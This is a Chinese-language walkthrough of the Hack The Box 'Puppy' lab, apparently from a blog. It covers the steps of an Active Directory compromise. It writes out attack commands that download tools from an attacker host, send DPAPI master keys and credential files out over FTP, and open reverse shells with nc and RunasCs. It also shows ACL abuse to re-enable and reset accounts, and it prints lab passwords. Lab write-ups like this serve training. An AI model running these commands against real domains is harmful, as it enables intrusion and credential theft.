当前位置: 首页 > news >正文

HTB 赛季8靶场 - Puppy

在这里插入图片描述

nmap扫描全端口

Nmap scan report for 10.129.243.117
Host is up, received echo-reply ttl 127 (0.47s latency).
Scanned at 2025-05-18 21:12:56 EDT for 551s
Not shown: 65512 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-19 08:17:50Z)
111/tcp   open  rpcbind?      syn-ack ttl 127
| rpcinfo: 
|   program version    port/proto  service
|   100003  2,3         2049/udp   nfs
|_  100003  2,3         2049/udp6  nfs
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
2049/tcp  open  mountd        syn-ack ttl 127 1-3 (RPC #100005)
3260/tcp  open  iscsi?        syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49696/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
54668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-time: 
|   date: 2025-05-19T08:19:55
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 55057/tcp): CLEAN (Timeout)
|   Check 2 (port 40598/tcp): CLEAN (Timeout)
|   Check 3 (port 41563/udp): CLEAN (Timeout)
|   Check 4 (port 2886/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 7h02m33s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

nfs探测

靶场开始就给了我们用户levi.james / KingofAkron2025!,我们先尝试访问nfs

smb探测

我们使用nxc快速了解smb
在这里插入图片描述

Bloodhound 探测

我们成功探测了smb,所以直接去LDAPserver 提取相关路径,开始分析攻击路线。

bloodhound-python -d puppy.htb -dc dc.puppy.htb -c All -u levi.james -p KingofAkron2025! --dns-timeout 10

在这里插入图片描述

我们添加找到的信息,到bloodhound
在这里插入图片描述
]

攻击路线分析

首先了解我们是谁,我们是隶属于MANPOWER的OU,这可能意味着我们有点能力?我们还是HR,HR貌似拥有对DEVELOPERS组的GenericWrite权限,这意味着我们能够加入DEVELOPERS组。
![[Pasted image 在这里插入图片描述
加入Developer组后,我并没有发现有趣的ACL东西。这里面可能隐藏这什么!我们看看developer组有哪些人员。
在这里插入图片描述

DEVELOPER组内成员并没有高级权限。接下来我们在全局来判定高价值用户,STEPH.COOPER_ADM这个用户显得非常有趣,我们将重点关注,看看他的权限情况。
在这里插入图片描述

他的上游好像没什么特别的。
在这里插入图片描述

我们看看STEPH.CHOOPER_ADM是否有STEPH.CHOOPER用户,发现存在。他两必然存在着一些联系。
在这里插入图片描述

这个用户拥有远程登录权限,并且和域控管理员账号相关,这个人将变得非常有意思。我设置为高价值用户。这个用户的上游也没有什么特别的。
![[Pasted image 在这里插入图片描述
首先进行一下密码喷洒吧,看看有没有别的收获。

levi.james / KingofAkron2025!
└─$ kerbrute passwordspray --dc dc.puppy.htb -d puppy.htb users 'KingofAkron2025!' -v

在这里插入图片描述

发现adam这个用户是锁定的,也就是说是失效用户,这种用户通常意味着机会。经过探查adam是developer组的,我们看看他的情况。我认为这三个都非常有趣,我们可能会在他们身上获取一些东西,因为SMB中有DEV组才能访问的内容。所以我将他们列入了重点关注对象。
在这里插入图片描述

在尝试获取SMB分享之前,我们看看用户密码修改时间的情况

cat 20250519051259_users.json | jq | grep 'pwdLastSet'

在这里插入图片描述

在这里插入图片描述

以新用户组身份尝试SMB分享

可以看到密码并非脚本修改,也就是说密码不会存在复用情况,我们得进一步慢慢探查。到此我们知道developer用户组里面有几个用户我们非常感兴趣,并且developer组很可能能够访问DEV的smb分享。我们先去smb分享看看。


levi.james / KingofAkron2025!###添加LEVI B.JAMES到developer组
bloodyAD -d puppy.htb -u levi.james -p KingofAkron2025! --dc-ip 10.129.243.117 add groupMember DEVELOPERS levi.james###smbclient 连接dev库
impacket-smbclient levi.james@dc.puppy.htb

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

Keepass2john变种 keepass4brute爆破.kdbx文件

嗯哼如我们所料,我们成功拿取里面的文件。这些文件里面是KeePass和相关的密码,这个是一个密码管理程序,他将带领我们走向胜利。我们发现了不寻常的地方。keepass2john无法正常使用,经过查询,我们发现了解决办法[[https://0xdf.gitlab.io/hackvent2024/hard#]],我们使用keepass4brute.sh完成攻击,发现密码。
在这里插入图片描述

先直接密码喷洒一下,没有成功。
在这里插入图片描述

那么我们有必要下载msi安装好,然后查看密码。kali也可以直接下载keepassxc完成相应操作。
在这里插入图片描述

HJKL2025!
Antman2025!
JamieLove2025!
ILY2025!
Steve2025!

以新密码进行喷洒

现在我们把这些密码全部喷洒一下,我们仅成功了一个用户
在这里插入图片描述

ant.edwards@puppy.htb:Antman2025!

这个用户在我们眼里是高价值用户,因为在之前我们已经从bloodhound了解到他可以导致我们获取远程的能力。
在这里插入图片描述

开启禁用用户&修改用户所有者&强制修改用户密码

那么接下来我们先获取ADAM用户

###开启ADAM用户
bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.129.243.117 remove uac -f LOCKOUT -f ACCOUNTDISABLE adam.silver###修改ADAM账户
bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.129.243.117 set owner adam.silver ant.edwardsbloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.129.243.117 set password adam.silver Adam@2025!

绕过密码最短修改周期限制

这一步我们发现了问题,貌似修改周期并不允许我们修改密码
在这里插入图片描述

所以我们需要修改pwdlastset的时间戳,来绕过这个限制。pwdlastsetChagne.py脚本如下

import ldap3 
server = ldap3.Server('10.129.243.117', port =389, use_ssl = False)  
connection = ldap3.Connection(server, 'CN=ANTHONY J. EDWARDS,DC=PUPPY,DC=HTB', 'Antman2025!', auto_bind=True) 
connection.bind()
connection.extend.standard.who_am_i() u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN' 
connection.modify('CN=ADAM D. SILVER,CN=USERS,DC=PUPPY,DC=HTB',{'pwdLastSet': [(ldap3.MODIFY_REPLACE, ['0'])]})

重新修改密码

python pwdlastsetChagne.pybloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.129.244.111 remove uac -f LOCKOUT -f ACCOUNTDISABLE adam.silverbloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.129.244.111 set password adam.silver Wobujidele1997@123evil-winrm -i dc.puppy.htb -u adam.silver -p Wobujidele1997@123

在这里插入图片描述

在这里插入图片描述

winrm远程登录

evil-winrm -i dc.puppy.htb -u adam.silver -p Wobujidele1997@123
nxc winrm 10.129.243.117 -u adam.silver -p Wobujidele1997@123

成功获取PSshell
在这里插入图片描述

这里我们看到用户有一个Microsoft Edge浏览器的链接,这很可能意味着浏览器里面有秘密,也就是DPAPI。搭建下载Winpeas 先快速扫描。

(New-Object Net.WebClient).DownloadFile('http://10.10.16.3/winPEASx64.exe','C:\Users\adam.silver\desktop\winPEASx64.exe')

DPAPI密码泄露

运行完winPEASx64之后,我们发现了一些有趣的隐藏文件,这非常类似于DPAPI,我们去瞅瞅
在这里插入图片描述

Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\adam.silver\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105
Get-ChildItem -Hidden C:\Users\adam.silver\AppData\Local\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105

我们发现了masterkey文件,也就是说DPAPI是可以完成解密的
在这里插入图片描述

确定攻击路线为DPAPI,我们开始攻击。

PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://10.10.16.3/ftp/1038bdea-4935-41a8-a224-9b3720193c86', 'C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105\1038bdea-4935-41a8-a224-9b3720193c86')PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://10.10.16.3/ftp/DFBE70A7E5CC19A398EBF1B96859CE5D-DESKTOP', 'C:\Users\adam.silver\Desktop\DFBE70A7E5CC19A398EBF1B96859CE5D')PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://10.10.16.3/ftp/DFBE70A7E5CC19A398EBF1B96859CE5D','C:\Users\adam.silver\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D')PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://10.10.16.3/ftp/BK-PUPPY', 'C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105\BK-PUPPY')PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://10.10.16.3/ftp/Preferred', 'C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105\Preferred')PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://10.10.16.3/ftp/CREDHIST', 'C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\CREDHIST')PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://10.10.16.3/ftp/SYNCHIST', 'C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\SYNCHIST')PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://10.10.16.3/ftp/link.lnk', 'C:\Users\adam.silver\desktop\Microsoft/ Edge.lnk')

我们成功解密DPAPI的masterkey

impacket-dpapi masterkey -t puppy.htb/adam.silver:'Wobujidele1997@123'@10.129.244.111 -file 1038bdea-4935-41a8-a224-9b3720193c86 

在这里插入图片描述

我们成功解密桌面的DPAPI文件,和CREDHIST文件,没有啥重要内容

impacket-dpapi credential -file DFBE70A7E5CC19A398EBF1B96859CE5D -key '0x67c93a5831a5d17bae13deb6ef3324f5c97abd363d8f146f5ac79f07fb2b2c0eb21433fcf211c15af4e79c1c72a512d3c8f181433b1fa50e78e7e146c27230ae'

ASREP攻击

我们尝试发起ASREP攻击,获取到了凭证hash但是破解失败。

(New-Object Net.WebClient).DownloadFile('http://10.10.16.3/LaZagne.exe','C:\Users\adam.silver\desktop\LaZagne.exe')bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.129.244.94 remove uac -f LOCKOUT -f ACCOUNTDISABLE adam.silverbloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.129.244.94 add uac -f DONT_REQ_PREAUTH adam.silverimpacket-GetNPUsers PUPPY/adam.silver -dc-ip 10.129.244.94 -no-pass

我们转向本地的2049端口,我们将2049端口转发,我们尝试连接未发现任何东西,可能是权限不足。或者2049没有绑定的内容。

(New-Object Net.WebClient).DownloadFile('http://10.10.16.3/chisel.exe','C:\Users\adam.silver\desktop\chisel.exe')sudo ./chisel server --reverse -v -p 1234 --socks5
./chisel.exe client -v 10.10.16.3:1234 R:socks

我们还发现一个有趣的点,我们发现user文件夹处,有ant这个用户,并且这个用户必adam权限要高,只是不能远程。所以我们有必要runascs成为ant用户看看

(New-Object Net.WebClient).DownloadFile('http://10.10.16.3/RunasCs.exe','C:\Users\adam.silver\desktop\RunasCs.exe').\RunasCs.exe "ant.edwards" 'Antman2025!' powershell.exe -r 10.10.16.3:9001.\RunasCs.exe "ant.edwards" "Antman2025!" powershell.exe --logon-type 3 --remote-impersonation -r 10.10.16.3:9001.\RunasCs.exe "ant.edwards" "Antman2025!" powershell.exe --logon-type 3 --remote-impersonation -c "whoami > C:\Users\adam.silver\Desktop\test.txt".\RunasCs.exe "ant.edwards" "Antman2025!" powershell.exe --logon-type 3runas.exe /env /noprofile /user:'ant.edwards' 'Antman2025!' "C:\Users\adam.silver\desktop\nc.exe -nc 10.10.16.3 4444 -e cmd.exe"

依旧没能执行成功,我们开始尝试翻找文件,我们在C:\backups中发现了一个有趣的文件,好像是一个网站的备份。我们想进去看看配置文件,发现了这个

        <bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn><bind-password>ChefSteph2025!</bind-password>

在这里插入图片描述

我们进入查询DPAPI

Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107
Get-ChildItem C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\

在这里插入图片描述

我们拥有密码所以我们可以直接窃取DPAPI中的密码

PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://10.10.16.3/ftp/556a2412-1275-4ccf-b721-e6a0b4f90407', 'C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407')PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://10.10.16.3/ftp/C8D69EBE9A43E9DEBF6B5FBD48B521B9', 'C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9')

我们下载好两个文件到攻击机,然后首先先破解masterkey

└─$ impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -t puppy.htb/steph.cooper:'ChefSteph2025!'@10.129.244.111

在这里插入图片描述


(uploadserver) ┌──(uploadserver)─(kali㉿kali)-[~/Desktop/HTB/puppy/ftp]
└─$ impacket-dpapi credential -file C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key '0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84'

在这里插入图片描述

我们获取了system权限的账户。

Username    : steph.cooper_adm
Unknown     : FivethChipOnItsWay2025!

在这里插入图片描述

相关文章:

HTB 赛季8靶场 - Puppy

nmap扫描全端口 Nmap scan report for 10.129.243.117 Host is up, received echo-reply ttl 127 (0.47s latency). Scanned at 2025-05-18 21:12:56 EDT for 551s Not shown: 65512 filtered tcp ports (no-response) Bug in iscsi-info: no string output. PORT STATE …...

频分复用信号在信道中的状态

频分复用是一种将信道总带宽划分为多个互不重叠的子频带&#xff0c;每路信号占用一个子频带以实现多路信号并行传输的复用技术。 1、基本概念和原理 频分复用&#xff08;Frequency Division Multiplexing, FDM&#xff09;的核心思想是通过频率划分实现多路信号共享同一物理…...

CSS之box-sizing、图片模糊、计算盒子宽度clac、(重点含小米、进度条案例)过渡

一、Box-sizing 在使用盒子模型时往往会出现由于border\ padding设置过大&#xff0c;从而导致的盒子被撑大的情况。 此时可以设置box-sizing: border-box (padding和boeder加起来设置的值不可超出width) 此时不会撑大盒子。可在初始化时一起设置 * { padding:0; maigin:…...

AliSQL:阿里巴巴开源数据库的技术革新与应用实践

精心整理了最新的面试资料和简历模板&#xff0c;有需要的可以自行获取 点击前往百度网盘获取 点击前往夸克网盘获取 引言 在数据驱动的互联网时代&#xff0c;高性能、高可靠的数据库系统是支撑企业核心业务的关键。AliSQL作为阿里巴巴集团基于MySQL深度定制的开源分支&…...

(二十四)Java网络编程全面解析:从基础到实践

一、网络编程概述 网络编程是现代软件开发中不可或缺的重要组成部分&#xff0c;它使得不同计算机上的程序能够相互通信和数据交换。Java作为一门成熟的编程语言&#xff0c;从最初版本就提供了强大的网络编程支持&#xff0c;使得开发者能够相对轻松地构建网络应用程序。 1.…...

50天50个小项目 (Vue3 + Tailwindcss V4) ✨ | Rotating Navigation (旋转导航)

&#x1f4c5; 我们继续 50 个小项目挑战&#xff01;—— Rotating Navigation 组件 仓库地址&#xff1a;&#x1f517;https://github.com/SunACong/50-vue-projects 项目预览地址&#xff1a;&#x1f517;https://50-vue-projects.vercel.app/ ✨ 组件目标 &#x1f300…...

OpenCV 第6课 图像处理之几何变换(重映射)

1. 概述 简单来说,重映射就是把一副图像内的像素点按照规则映射到到另外一幅图像内的对应位置上去,形成一张新的图像。 因为原图像与目标图像的像素坐标不是一一对应的。一般情况下,我们通过重映射来表达每个像素的位置(x,y),像这样: g(x,y)=f(h(x,y)) 在这里g()是目标图…...

传输层协议:UDP和TCP

1.传输层概念 传输层主要负责两台主机之间的数据传输&#xff0c;使数据从发送端到接收端。 端口号 端口号标识了一个主机上进行通信的不同的应用程序。 传输层接收到数据后&#xff0c;是要给到具体的应用层的进程。所以发送端的传输层封装报文时&#xff0c;就要添加上将来…...

[Linux] Linux线程信号的原理与应用

Linux线程信号的原理与应用 文章目录 Linux线程信号的原理与应用**关键词****第一章 理论综述****第二章 研究方法**1. **实验设计**1.1 构建多线程测试环境1.2 信号掩码策略对比实验 2. **数据来源**2.1 内核源码分析2.2 用户态API调用日志与性能监控 **第三章 Linux信号的用法…...

MySQL 库的操作 -- 字符集和校验规则,库的增删查改,数据库的备份和还原

目录 1. 字符集和校验规则 1.1 查看系统默认字符集以及检验规则 1.2 查看数据库支持的字符集 1.3 查看数据库支持的字符集检验规则 1.4 校验规则对数据库的影响 2. 数据库的操作 2.1 创建数据库 2.1.1 语法 2.1.2 示例 2.2 查看数据库 2.2.1 语法 2.2.2 查看当前使…...

Opencv常见学习链接(待分类补充)

文章目录 1.常见学习链接 1.常见学习链接 1.Opencv中文官方文档 2.Opencv C图像处理&#xff1a;矩阵Mat 随机数RNG 计算耗时 鼠标事件 3.Opencv C图像处理&#xff1a;亮度对比度饱和度高光暖色调阴影漫画效果白平衡浮雕羽化锐化颗粒感 4.OpenCV —— 频率域滤波&#xff…...

Docker网络全景解析:Overlay与Macvlan深度实践,直通Service Mesh集成核心

一、Docker网络基石&#xff1a;从单机到跨主机的本质跨越 1.1 网络模式全景图 Docker原生网络架构&#xff1a; ├─ 单机网络&#xff08;默认&#xff09; │ ├─ bridge&#xff1a;默认NAT模式&#xff08;docker0网桥&#xff09; │ ├─ host&#xff1a;共…...

十五、面向对象底层逻辑-BeanDefinitionRegistryPostProcessor接口设计

一、引言&#xff1a;Spring容器启动的核心枢纽 在Spring容器的启动过程中&#xff0c;BeanDefinitionRegistryPostProcessor接口是开发者深度介入Bean定义注册阶段的核心扩展点。作为BeanFactoryPostProcessor的子接口&#xff0c;它赋予了开发者对BeanDefinitionRegistry的直…...

图表组件库TeeChart Pro VCL/FMX :简化复杂数据处理的可视化利器

在数据驱动决策的时代&#xff0c;把复杂的数据转化为直观、易懂的图表&#xff0c;是很多人都面临的挑战。TeeChart Pro VCL/FMX 就是一款能帮你解决这个难题的强大工具&#xff0c;它为开发者和数据分析师提供了丰富的功能&#xff0c;让数据可视化变得简单又高效。 一、丰富…...

从客厅到驾驶舱:FSHD 如何成为全场景显示「破局者」

一、当显示技术遇到「场景困境」&#xff1a;传统方案的三大痛点 周末午后的客厅&#xff0c;阳光透过纱窗洒在幕布上&#xff0c;传统投影机的画面瞬间发白&#xff1b;高速公路上&#xff0c;车载 HUD 在强光下字迹模糊&#xff0c;驾驶员不得不频繁低头看仪表盘&#xff1b;…...

时源芯微|开关电源电磁干扰的控制技术

要有效解决开关电源的电磁干扰问题&#xff0c;可从以下三个关键方面着手&#xff1a;其一&#xff0c;降低干扰源产生的干扰信号强度&#xff1b;其二&#xff0c;阻断干扰信号的传播路径&#xff1b;其三&#xff0c;提升受干扰体的抗干扰能力。基于此&#xff0c;开关电源电…...

动态规划之爬楼梯模型

文章目录 爬楼梯模型LeetCode 746. 使用最小花费爬楼梯思路Golang 代码 LeetCode 377. 组合总和 Ⅳ思路Golang 代码 LeetCode 2466. 统计构造好字符串的方案数思路Golang 代码 LeetCode 2266. 统计打字方案数思路Golang 代码 爬楼梯模型 爬楼梯模型是动态规划当中的一个经典模型…...

图论学习笔记 3

自认为写了很多&#xff0c;后面会出 仙人掌、最小树形图 学习笔记。 多图警告。 众所周知王老师有一句话&#xff1a; ⼀篇⽂章不宜过⻓&#xff0c;不然之后再修改使⽤的时候&#xff0c;在其中找想找的东⻄就有点麻烦了。当然⽂章也不宜过多&#xff0c;不然想要的⽂章也不…...

进阶知识:自动化测试框架开发之无参的函数装饰器

进阶知识&#xff1a;自动化测试框架开发之无参的函数装饰器 from functools import wrapsdef func_2(func):"""无参的函数装饰器:param func::return:"""wraps(func)def wrap_func(*args, **kwargs):print(开始执行&#xff1a; func.__name__…...

【实验增效】5 μL/Test 高浓度液体试剂!Elabscience PE Anti-Mouse Ly6G抗体 简化流式细胞术流程

产品概述 Elabscience 推出的 PE Anti-Mouse Ly6G Antibody (1A8, 货号: E-AB-F1108D) 是一款高特异性、高灵敏度的流式抗体&#xff0c;专为小鼠中性粒细胞&#xff08;Ly6G⁺细胞&#xff09;的精准检测而设计。该抗体采用PE&#xff08;藻红蛋白&#xff09;标记&#xff0…...

多模态光学成像革命:OCT、荧光与共聚焦的跨尺度融合新范式

一、技术融合的必然性 在生物医学成像领域,单一模态往往存在视野-分辨率悖论。光学相干断层扫描(OCT)虽能实现毫米级深度扫描(1010mm视野),但其微米级分辨率难以解析亚细胞结构;荧光显微成像(FMI)虽具有分子特异性标记优势(88mm中观视野),却受限于光毒性及穿透深度…...

CHI中ordering的抽象

上图是一个典型的读操作过程中的几个流程&#xff0c;其中&#xff1a; compdata, 这个就是CHI协议保序之Comp保序-CSDN博客中提到的&#xff0c;comp保序&#xff0c;它实现的功能是&#xff0c;通知这个请求的RN, 你的请求&#xff0c;我已经开始处理了&#xff0c;同时也相当…...

华为云Flexus+DeepSeek征文 | 基于ModelArts Studio 与 Cline 快速构建AI编程助手

目录 一、前言 二、ModelArts Studio&#xff08;MaaS&#xff09;介绍与应用场景 2.1ModelArts Studio&#xff08;MaaS&#xff09;介绍 2.2 ModelArts Studio&#xff08;MaaS&#xff09;使用场景 2.3 开通MaaS服务 2.4 开通DeepSeek-V3商用服务 三、Cline简介和安装 3.1 C…...

第二章 何谓第二大脑?笔记记录

2025/05/08 发表想法 用词太准确了&#xff0c;从信息过载-信息倦怠&#xff0c;正是我们当今社会信息工作者中正在经历的事情&#xff0c;同时大部分人也正在产生焦虑、不安、失眠等社会现象。 原文&#xff1a;然而信息的泛滥&#xff0c;非但难以起到赋能作用&#xff0c;反…...

题解:AT_abc244_e [ABC244E] King Bombee

一道图上 DP 的好题。 &#xff08;题目自己看&#xff0c;我就不说了。&#xff09; 首先一看到求方案数&#xff0c;首先就要反应的是 DP 或者排列组合&#xff0c;反正考试的时候我写半天排列组合没写出来&#xff0c;所以就只能是 DP 了。&#xff08;好牵强的理由啊………...

C++显式声明explicit

C显示声明explicit 在 C 中&#xff0c;explicit 关键字用于修饰单参数构造函数或多参数构造函数&#xff08;C11 起&#xff09;&#xff0c;其核心作用是禁止编译器的隐式类型转换。 一、必须加 explicit 的典型场景 1. 单参数构造函数 当构造函数只有一个参数时&#xff…...

哈希查找方法

已知哈希表长度为11&#xff0c;哈希函数为H&#xff08;key&#xff09;&#xff1d;key&#xff05;11&#xff0c;随机产生待散列的小于50的8个元素&#xff0c;同时采用线性探测再散列的方法处理冲突。任意输入要查找的数据&#xff0c;无论是否找到均给出提示信息。 int f…...

AI编程辅助哪家强?深度解析主流AI编程工具的现状与未来-优雅草卓伊凡

AI编程辅助哪家强&#xff1f;深度解析主流AI编程工具的现状与未来-优雅草卓伊凡 引言&#xff1a;AI编程的崛起与开发者的新选择 在当今快速发展的科技时代&#xff0c;AI编程辅助工具已经成为开发者不可或缺的得力助手。作为一名资深的程序员&#xff0c;”优雅草卓伊凡”经…...

Python打卡训练营day27-函数-装饰器

知识点回顾&#xff1a; 装饰器的思想&#xff1a;进一步复用函数的装饰器写法注意内部函数的返回值 作业&#xff1a; 编写一个装饰器 logger&#xff0c;在函数执行前后打印日志信息&#xff08;如函数名、参数、返回值&#xff09; 装饰器实际上是一个增强函数&#xff0c;它…...

EtherCAT通信协议

EtherCAT&#xff08;Ethernet for Control Automation Technology&#xff09;是一种高性能的实时工业以太网通信协议&#xff0c;专为工业自动化和控制系统的需求设计。它结合了以太网的灵活性和工业实时通信的高效性&#xff0c;广泛应用于运动控制、机器人、过程自动化等领…...

多线程下如何保证事务的一致性

以下是关于Java多线程的详细介绍&#xff0c;适合作为知识博客的内容。我将从基础概念开始&#xff0c;逐步深入到分布式场景、线程池配置以及Spring Cloud集成等高级主题&#xff0c;并提供丰富的业务场景示例。 Java多线程核心概念 1. 线程与进程的区别 进程&#xff1a;程…...

OpenCv高阶(8.0)——答题卡识别自动判分

文章目录 前言一、代码分析及流程讲解&#xff08;一&#xff09;初始化模块正确答案映射字典&#xff08;题目序号: 正确选项索引&#xff09;图像显示工具函数 &#xff08;二&#xff09;轮廓处理工具模块&#xff08;三&#xff09;几何变换核心模块 二、主处理流程图像读取…...

量子通信技术:原理、应用与未来展望

在当今数字化时代&#xff0c;信息安全是全球关注的焦点。随着量子计算技术的飞速发展&#xff0c;传统的加密方法面临着前所未有的挑战。量子通信技术作为一种新兴的通信手段&#xff0c;以其绝对安全的特性&#xff0c;为信息安全领域带来了新的希望。本文将深入探讨量子通信…...

Token的组成详解:解密数字身份凭证的构造艺术

在当今的互联网身份认证体系中&#xff0c;Token如同数字世界的"安全护照"&#xff0c;承载着用户的身份信息和访问权限。据统计&#xff0c;现代应用中80%以上的身份验证依赖于Token机制。本文将深入解析Token的各个组成部分&#xff0c;通过典型实例揭示其设计原理…...

【SFT监督微调总结】大模型SFT全解析:从原理到工具链,解锁AI微调的核心密码

文章目录 一. 什么是监督微调(SFT)?二. SFT的核心原理与流程2.1 基本原理2.2 训练流程三、SFT训练的常用方法四、SFT训练用的数据格式4.1、基础单轮指令格式1. Alpaca 格式2. 单轮QA格式3. 代码-注释对4.2、多轮对话格式1. ShareGPT 格式2. 层次化对话格式3. 角色扮演对话4.…...

MacBook Air A2179(Intel版)安装macOS Catalina所需时间

MacBook Air A2179&#xff08;Intel版&#xff09;安装macOS Catalina所需时间如下&#xff1a; 一、标准安装时间范围 常规安装&#xff08;通过App Store&#xff09; • 下载时间&#xff1a;约30-60分钟&#xff08;取决于网络速度&#xff0c;安装包约8GB&#xff09; •…...

Git的windows开发与linux开发配置

Git的基本配置 安装 linux可以使用包管理器安装windows可以使用 mingw的git&#xff1a;https://git-scm.com/downloadsTortoiseGit&#xff1a;https://tortoisegit.org/download/ 配置 分为系统配置–system、全局配置–global、项目配置–local 配置名称和邮箱 git co…...

使用Mathematica绘制一类矩阵的特征值图像

学习过线性代数的&#xff0c;都知道&#xff1a;矩阵的特征值非常神秘&#xff0c;但却携带着矩阵的重要信息。 今天&#xff0c;我们将展示&#xff1a;一类矩阵&#xff0c;其特征值集体有着很好的分布特征。 modifiedroots[c_List] : Block[{a DiagonalMatrix[ConstantAr…...

C++中的宏

0 资料 最值宏do{}while(0)的宏封装技巧 1 最值宏 - C最值的宏&#xff0c;在两个头文件中&#xff0c;分别为cfloat和climits。其中&#xff0c;float的最值宏在cfloat中&#xff0c;且cfloat没有负值的最小宏&#xff0c;而其他char、int和double是在climits中。如下// --…...

谷粒商城的三级分类实现

先查出全部的数据再分类 分类的一级分类是根据数据的Parent_id进行确定的&#xff0c;所以要进行筛选&#xff1a; 主方法&#xff1a; public List<CategoryEntity> listWithTree() {//1.查出所有分类List<CategoryEntity> entities baseMapper.selectList(nul…...

基于大模型预测的闭合性髌骨骨折诊疗全流程研究报告

目录 一、引言 1.1 研究背景与目的 1.2 研究意义与价值 二、大模型预测原理与方法 2.1 大模型概述 2.2 预测方法与数据输入 2.3 模型训练与优化 三、术前预测分析 3.1 骨折类型预测 3.2 损伤程度评估 3.3 潜在风险预测 四、手术方案制定 4.1 传统手术方案对比 4.…...

基于CodeBuddy的Craft完成一个数字华容道的小游戏

